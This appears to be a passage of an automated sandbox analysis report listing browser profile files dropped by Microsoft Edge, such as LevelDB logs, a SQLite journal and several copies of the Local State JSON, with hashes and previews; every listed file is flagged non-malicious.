                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):317272
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8912820820788924
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:6uVGmZjFVyl3hRkWvisVoVgfy+41qxv8eyNyb0yDytMyxexyZf:6n0
                                                                                                                                                                                                                                                                          MD5:3E7F4660CC28AA023D4ADE7F19B6D4FB
                                                                                                                                                                                                                                                                          SHA1:9D22B9E001F76A904EF489D4777E3E918AB62563
                                                                                                                                                                                                                                                                          SHA-256:CBCE8F8C16F379D4EAEBB3A00D3EAA25FE995CBA1E7E1F8D6EEACDD456F9E7BA
                                                                                                                                                                                                                                                                          SHA-512:EB561BC6E42D1EDCA5357F9EACC804D763E6E0671E3D6DD7E17DBF54D1697C549960F9BF58786BCC9D12F767FEC17CE5A7EB80C3E975B5576C860792915B719A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:7....-...........XE6.:...,\...n..........XE6.:...^.J.~.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):419
                                                                                                                                                                                                                                                                          Entropy (8bit):3.6926851822774145
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:/XntM+dll3sedhO38WrOuuuuuuuuuuuuAysedhOJUn:lllc8zWrOuuuuuuuuuuuuA/8Xn
                                                                                                                                                                                                                                                                          MD5:E96DBD4DE314E028B5700346610687EB
                                                                                                                                                                                                                                                                          SHA1:593E5426E8590A8A06075ACFDADAC24F58009248
                                                                                                                                                                                                                                                                          SHA-256:AA95319C89CB029096E37DEE5DC5E32E39076548C24A6E7377E8D5DCB7B88BF3
                                                                                                                                                                                                                                                                          SHA-512:F737650A5D6B58B9EABD7F25D9EEC561F65781AA4BF98E7432A7AA7DB0D9B60FAEC610B9DFFC8AD2E672CC27EC744BD22F000F339F86241BBC27C10030B9094E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:A..r.................20_1_1...1.,U.................20_1_1...1....0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............`...0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                          Entropy (8bit):5.224629057451849
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv4MFUst+q2PCHhJ23oH+TcwtfrK+IFUtJv4OFZZmwPv4OFNVkwOCHhJ23oH+t:7sMFIvBYeb23FUtqA/Yo56Yeb3J
                                                                                                                                                                                                                                                                          MD5:3182AEF125E4E63161D1F9FC587FE8AB
                                                                                                                                                                                                                                                                          SHA1:A0A29E7ED3EBFB7A2F7F0B86A1E382CE2DC2999F
                                                                                                                                                                                                                                                                          SHA-256:33B13EF8B60E3F4C17637EA279A75A8B9F0A36A1236A60BE111AF6BAACE4BB5E
                                                                                                                                                                                                                                                                          SHA-512:7C148B085014EBDA93A92A0D4821E03A01A5F788F2F9ED28EADDDDAAAB45731C51C8C1052274F1512A8CC9A6257ED9CB1AF20744EB193E74435DACEC54FB98CE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.360 10c8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/09-08:55:36.362 10c8 Recovering log #3.2025/01/09-08:55:36.362 10c8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                          Entropy (8bit):5.224629057451849
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv4MFUst+q2PCHhJ23oH+TcwtfrK+IFUtJv4OFZZmwPv4OFNVkwOCHhJ23oH+t:7sMFIvBYeb23FUtqA/Yo56Yeb3J
                                                                                                                                                                                                                                                                          MD5:3182AEF125E4E63161D1F9FC587FE8AB
                                                                                                                                                                                                                                                                          SHA1:A0A29E7ED3EBFB7A2F7F0B86A1E382CE2DC2999F
                                                                                                                                                                                                                                                                          SHA-256:33B13EF8B60E3F4C17637EA279A75A8B9F0A36A1236A60BE111AF6BAACE4BB5E
                                                                                                                                                                                                                                                                          SHA-512:7C148B085014EBDA93A92A0D4821E03A01A5F788F2F9ED28EADDDDAAAB45731C51C8C1052274F1512A8CC9A6257ED9CB1AF20744EB193E74435DACEC54FB98CE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.360 10c8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/09-08:55:36.362 10c8 Recovering log #3.2025/01/09-08:55:36.362 10c8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):753
                                                                                                                                                                                                                                                                          Entropy (8bit):4.037333775091125
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
                                                                                                                                                                                                                                                                          MD5:C5675C35B320A0898802E1ECFD3476E8
                                                                                                                                                                                                                                                                          SHA1:B6CA1C2EE1340662A7B495778416988006748327
                                                                                                                                                                                                                                                                          SHA-256:8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
                                                                                                                                                                                                                                                                          SHA-512:DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):342
                                                                                                                                                                                                                                                                          Entropy (8bit):5.212655043460406
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv4zN+q2PCHhJ23oH+TcwtfrzAdIFUtJv4GZmwPv4CVkwOCHhJ23oH+Tcwtfrm:7skvBYeb9FUtqG/Y656Yeb2J
                                                                                                                                                                                                                                                                          MD5:F9693B3805E9E9EC42793D5185674983
                                                                                                                                                                                                                                                                          SHA1:6F10FF6AE9A9A14D8D150809376A00FF47769DF2
                                                                                                                                                                                                                                                                          SHA-256:303C88EDE2B40ADD840C7EFE8D1CD4D24942F74DCB4F3B2FCF3520E806184F65
                                                                                                                                                                                                                                                                          SHA-512:9CBC2A55D9BA39AB7119CE97A80EF609B41EB95ABCC62B006D55B4486AEDF5AF7475D265AD9027569B782931A0696302B75A486275A5BD229650A4EC407E7805
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.354 10c8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/09-08:55:36.355 10c8 Recovering log #3.2025/01/09-08:55:36.355 10c8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):342
                                                                                                                                                                                                                                                                          Entropy (8bit):5.212655043460406
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv4zN+q2PCHhJ23oH+TcwtfrzAdIFUtJv4GZmwPv4CVkwOCHhJ23oH+Tcwtfrm:7skvBYeb9FUtqG/Y656Yeb2J
                                                                                                                                                                                                                                                                          MD5:F9693B3805E9E9EC42793D5185674983
                                                                                                                                                                                                                                                                          SHA1:6F10FF6AE9A9A14D8D150809376A00FF47769DF2
                                                                                                                                                                                                                                                                          SHA-256:303C88EDE2B40ADD840C7EFE8D1CD4D24942F74DCB4F3B2FCF3520E806184F65
                                                                                                                                                                                                                                                                          SHA-512:9CBC2A55D9BA39AB7119CE97A80EF609B41EB95ABCC62B006D55B4486AEDF5AF7475D265AD9027569B782931A0696302B75A486275A5BD229650A4EC407E7805
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.354 10c8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/09-08:55:36.355 10c8 Recovering log #3.2025/01/09-08:55:36.355 10c8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):120
                                                                                                                                                                                                                                                                          Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                          MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                          SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                          SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                          SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                          Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                          MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                          SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                          SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                          SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:117.0.2045.47

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44170
                                                                                                                                                                                                                                                                          Entropy (8bit):6.090538788133146
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgCLmZt+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynxtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:34043B0C78EB2698EC87042AA0C7549B
                                                                                                                                                                                                                                                                          SHA1:251A05BC7E12413AB3CCA7A62E40352242ABC56C
                                                                                                                                                                                                                                                                          SHA-256:051568528CBA91CEFBC3E556D42DB5A5E047D5B56C7B5C1005161A8CC898F608
                                                                                                                                                                                                                                                                          SHA-512:92FF0791D1CF6299FCDEC2BDAE3E0F1BCA2B101D4BA2DAFB79AA576E516D4D024C4D0F53AEF5734B9ED0393AE7333C948E253C183C4D32DDEA02483D8BAC573A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF37e2a.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44170
                                                                                                                                                                                                                                                                          Entropy (8bit):6.090538788133146
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgCLmZt+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynxtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:34043B0C78EB2698EC87042AA0C7549B
                                                                                                                                                                                                                                                                          SHA1:251A05BC7E12413AB3CCA7A62E40352242ABC56C
                                                                                                                                                                                                                                                                          SHA-256:051568528CBA91CEFBC3E556D42DB5A5E047D5B56C7B5C1005161A8CC898F608
                                                                                                                                                                                                                                                                          SHA-512:92FF0791D1CF6299FCDEC2BDAE3E0F1BCA2B101D4BA2DAFB79AA576E516D4D024C4D0F53AEF5734B9ED0393AE7333C948E253C183C4D32DDEA02483D8BAC573A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF37e88.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44170
                                                                                                                                                                                                                                                                          Entropy (8bit):6.090538788133146
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgCLmZt+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynxtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:34043B0C78EB2698EC87042AA0C7549B
                                                                                                                                                                                                                                                                          SHA1:251A05BC7E12413AB3CCA7A62E40352242ABC56C
                                                                                                                                                                                                                                                                          SHA-256:051568528CBA91CEFBC3E556D42DB5A5E047D5B56C7B5C1005161A8CC898F608
                                                                                                                                                                                                                                                                          SHA-512:92FF0791D1CF6299FCDEC2BDAE3E0F1BCA2B101D4BA2DAFB79AA576E516D4D024C4D0F53AEF5734B9ED0393AE7333C948E253C183C4D32DDEA02483D8BAC573A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3801e.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44170
                                                                                                                                                                                                                                                                          Entropy (8bit):6.090538788133146
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgCLmZt+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynxtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:34043B0C78EB2698EC87042AA0C7549B
                                                                                                                                                                                                                                                                          SHA1:251A05BC7E12413AB3CCA7A62E40352242ABC56C
                                                                                                                                                                                                                                                                          SHA-256:051568528CBA91CEFBC3E556D42DB5A5E047D5B56C7B5C1005161A8CC898F608
                                                                                                                                                                                                                                                                          SHA-512:92FF0791D1CF6299FCDEC2BDAE3E0F1BCA2B101D4BA2DAFB79AA576E516D4D024C4D0F53AEF5734B9ED0393AE7333C948E253C183C4D32DDEA02483D8BAC573A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a70f.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44170
                                                                                                                                                                                                                                                                          Entropy (8bit):6.090538788133146
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgCLmZt+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynxtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:34043B0C78EB2698EC87042AA0C7549B
                                                                                                                                                                                                                                                                          SHA1:251A05BC7E12413AB3CCA7A62E40352242ABC56C
                                                                                                                                                                                                                                                                          SHA-256:051568528CBA91CEFBC3E556D42DB5A5E047D5B56C7B5C1005161A8CC898F608
                                                                                                                                                                                                                                                                          SHA-512:92FF0791D1CF6299FCDEC2BDAE3E0F1BCA2B101D4BA2DAFB79AA576E516D4D024C4D0F53AEF5734B9ED0393AE7333C948E253C183C4D32DDEA02483D8BAC573A
                                                                                                                                                                                                                                                                          Malicious:false
